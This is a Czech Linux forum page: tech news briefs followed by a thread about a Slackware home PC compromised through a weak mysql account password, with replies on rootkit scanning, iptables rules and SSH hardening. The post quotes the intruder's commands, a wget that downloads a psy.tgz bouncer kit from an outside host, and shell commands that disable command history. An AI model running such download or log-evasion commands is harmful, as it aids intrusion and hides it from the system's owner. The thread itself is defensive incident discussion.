Byla vydána nová verze 2.53.18.2 svobodného multiplatformního balíku internetových aplikací SeaMonkey (Wikipedie). Přehled novinek v poznámkách k vydání.
Na blogu programovacího jazyka Swift byl publikován příspěvek Psaní aplikací pro GNOME v programovacím jazyce Swift. Používá se Adwaita pro Swift.
egui je GUI knihovna pro programovací jazyk Rust běžící na webu i nativně. Vydána byla verze 0.27.0.
Byla vydána nová verze 6.1 živé linuxové distribuce Tails (The Amnesic Incognito Live System), jež klade důraz na ochranu soukromí uživatelů a anonymitu. Přehled změn v příslušném seznamu. Tor Browser byl povýšen na verzi 13.0.13. Thunderbird na verzi 115.9.0.
Linka STOPonline.cz v roce 2023 přijala 3700 hlášení závadného obsahu na internetu, 22 bylo předáno PČR, 23 bylo předáno ISP a 944 závadových domén zobrazujících dětskou nahotu či pornografii bylo nahráno do mezinárodního systému ICCAM, který je spravován asociací INHOPE.
Byla publikována podrobná analýza v upstreamu již opravené bezpečnostní chyby CVE-2024-1086 v Linuxu v nf_tables.
Byla vydána nová verze 4.1 svobodného 3D softwaru Blender. Přehled novinek i s náhledy a videi v obsáhlých poznámkách k vydání.
Úkolníček Taskwarrior (Wikipedie) pro správu úkolů z příkazového řádku byl vydán ve verzi 3.0.0.
Společnost Canva stojící za stejnojmenným webovým grafickým editorem koupila společnost Serif stojící za grafickým editorem Affinity.
Byla vydána betaverze Fedora Linuxu 40, tj. poslední zastávka před vydáním finální verze, která je naplánována na úterý 16. dubna. Z novinek (ChangeSet) lze vypíchnout podporu frameworku pro strojové učení PyTorch. Fedora KDE Plasma Desktop přichází s Plasmou 6 a běží nad Waylandem. Fedora Workstation přichází s GNOME 46.
Používám Slackware 10.0.
Jádro distribuční s jedinou drobnou úpravou.
Většina software pochází z distribučních balíčků, ale mám i nějaké kompilované ze zdrojových kódů a předkompilované z http://linuxpackages.net/.
Včera večer jsem pracoval na počítači a zůstal jsem připojený k internetu i přes to, že jsem nic nestahoval ani nikde nebrouzdal. Mám externí modem, a tak slyším každý přenos dat. Asi po hodině ticha najednou začal modem pracovat (typické skřípění, nebo šumění z reproduktoru modemu). Když jsem si toho po chvíli všiml, začal jsem pátrat po tom, co je tomu příčinou. Nejprve mě napadl poštovní klient, ale nebyl spuštěný. Spustil jsem tcpdump a odchytil nějaké spojení na adresu http://sigma.hostingfacile.net/. Dalším krokem bylo spuštění ps aux kde jsem ve výpisu našel přihlášeného uživatele mysql. Vzhledem k tomu, že počítač využívám sám a MySql jako službu mám vypnutou, byla pro mě návštěva uživatele mysql opravdovým překvapením. Při dalším výpisu ps aux už na mě "vybafl" uživatel mysql připojený hned několikrát. A co víc! Jeden z jeho procesů byl wget -c http://sufletl.home.ro/psy.tgz. A to byl právě ten okamžik, kdy jsem s velkou silou vytrhl kabel z modemu.
Po odpojení jsem chvíli přemýšlel a vydal jsem se na průzkum napáchaných škod. Nejprve do /etc/passwd, kde jsem objevil toto:
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bashMyslím, že by tam neměl být ten shell, ale jistý si nejsem.
Přihlásil jsem se jako uživatel mysql a hledal v domovském adresáři /var/lib/mysql soubor .bash_history, ale kromě mých databází tam nic nebylo. Že by něco takového?:
unset HISTFILE unset HISTSAVE history -n unset WATCH export HISTFILE=/dev/null
Smazal jsem uživatele mysql a připojil k internetu a za neustálého kontrolování přenosu jsem stáhl inkriminovaný soubor psy.tgz. Myslel jsem, kdovíco najdu, ale jde o celkem běžný soft. Trochu googlu a našel jsem tohle. Po přečtení reakcí jsem narazil na exploit, ale z toho nejsem dvakrát moudrý.
Taky jsem proběhl všechny tmp adresáře a ve /var/tmp/ jsme objevil adresář .bash, který odpovídá obsahu psy.tgz. Je s podivem, že tam byl celý když jsem viděl jak se stahuje... leda bych připojení ukončil těsně po stažení.
Otázky zní:
Jak získal útočník přístup do mého počítače?
Jak tomu napříště zabránit?
Jaké kroky podniknout?
Stala by se to, i kdybych použil pouze distribuční software - chyba v zabezpečení software třetích stran?
Co jsem zanedbal?
Jak jsou na tom jiné distribuce? Mandrake?
Co si o tom myslíte?
Jistě je pravdou, že správný administrátor systému by situaci neměl nechat dojít až do tohoto stavu a měl by ji předcházet. Především pravidelnou aktualizací a bezpečnostními záplatami. Stalo se.
Připojuji se teď k internetu s velkou opatrností, spouštím okamžitě tcpdump a neustále kontroluji spuštěné procesy. A to rozhodně není nic příjemného. Budu rád, podělíte-li se se mnou o své zkušenosti, nápady a rady.
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash
ten zbytok je fakt divny
Domain name: hostingfacile.net Registrant Contact: Eurologon S.r.l. Enzo Baiotto (domains@eurologon.com) +39.0119473512 Fax: +39 011 9409691 Via Roma 30 Trofarello, TO 10028 IT Administrative Contact: Eurologon S.r.l. Enzo Baiotto (hostmaster@eurologon.com) +39.0119473512 Fax: +39.0115503318 Via Roma 30 Trofarello, TO 10028 IT Billing Contact: Eurologon S.r.l. Enzo Baiotto (hostmaster@eurologon.com) +39.0119473512 Fax: +39.0115503318 Via Roma 30 Trofarello, TO 10028 IT Technical Contact: Eurologon S.r.l. Enzo Baiotto (hostmaster@eurologon.com) +39.0119473512 Fax: +39.0115503318 Via Roma 30 Trofarello, TO 10028 IT Status: Locked Name Servers: ns1.hostingfacile.net ns2.hostingfacile.net Creation date: 18 Apr 2002 16:38:18 Expiration date: 18 Apr 2006 16:38:18
ori.. bash export PATH="." httpd exit port-ul bouncerului este 50001 .. #HackTeam rullez...!No, spust si tam chkrootkit a rkhunter a uvidis sam...
Apache 1.3.31 [ Vulnerable ] PHP 4.3.7 [ Vulnerable ] Checking for allowed protocols... [ Warning (SSH v1 allowed) ]To jsem opravil...
Ano, používám jádro 2.4.x.
Stínová hesla - shadowing používám.
Iptables jsem nastavil takhle, snad to jako základ stačí:
iptables -P INPUT DROP iptables -P OUTPUT ACCEPT iptables -P FORWARD DROP iptables -A INPUT -i ! ppp+ -j ACCEPT iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT iptables -A INPUT -j LOG --log-prefix "INPUT drop: "Tripwire jsem naistaloval, ale něco je špatně:
Please enter your local passphrase: Parsing policy file: /etc/tripwire/tw.pol Generating the database... *** Processing Unix File System *** Software interrupt forced exit: Segmentation FaultVerze Tripwire:
Tripwire(R) 2.3.0.47 for LinuxNerozumím co znamená "povýšení práv".
SSH potřebuji. Jaký význam má zakázat přístup rootovi přes ssh, když se může přilásit běžný uživatel a použít su root? Přihlašování pomocí klíčů je možná příliš, bude stačit dostatečně silné heslo. Telnet zapnutý nemám.
Firewall jsem nastavil viz. výše. Nevím však, jestli je to dost paranoidně.
Přihlašování pomocí klíčů je možná příliš, bude stačit dostatečně silné heslo.Je to Vas nazor, nebudu Vam ho brat. Muzete ale zarucit, ze vsechny nezamcene ucty na tom pocitaci budou mit dostatecne silna hesla?
Jaký význam má zakázat přístup rootovi přes ssh, když se může přilásit běžný uživatel a použít su root?Da se nastavit, ze
su root
muze pouzit pouze pokud ucet, ze ktereho tak cini, je ve skupine wheel. A treba ucet, pod kterym se utocnik prihlasi, ve wheel nebude.
Firewall jsem nastavil viz. výše. Nevím však, jestli je to dost paranoidně.Podle me ano (predpokladam, ze conntrack pouzivate, jinak RELATED tam je zbytecne). Jedna poznamka, lepsi nez:
iptables -A INPUT -i ! ppp+ -j ACCEPTje:
iptables -A INPUT -i lo -j ACCEPTProc povolovat pristup ze vsech rozhrani krome ppp, kdyz ve skutecnosti jedine co potrebujete je pristup z lo? I pokud tam mate eth rozhrani pripojene k siti, ktere duverujete, je vzdy lepsi to uvest explicitne nez povolovat pausalne.
Chyba byla nejspíš právě ve slabém hesle uživatele mysql a ta se mohla stát na kterékoliv distribuci. Rozhodně neinstaluji a nespouštím každou kravinu, právě naopak, snažím se minimalizovat instalovaný software.
Přestože problém nebyl zapříčiněn chybou, která mohla být zazáplatována, budu teď ale sledovat adresář patches pečlivěji. Po průniku do neopatchovného systému by měl rozhodně útočník jednodušší prácí např. s výběrem exploitu.
Jádra 2.4.x patří "bezpečnějším" vzhledem k jejich konzervativnímu přístupu k zařazování nových fičurek.
Zřejmě jsem se nechal příjemně ukolébat představou bezpečnosti a nevěnoval jsem ji takovou pozornost jakou by si zasloužila.
Tiskni Sdílej: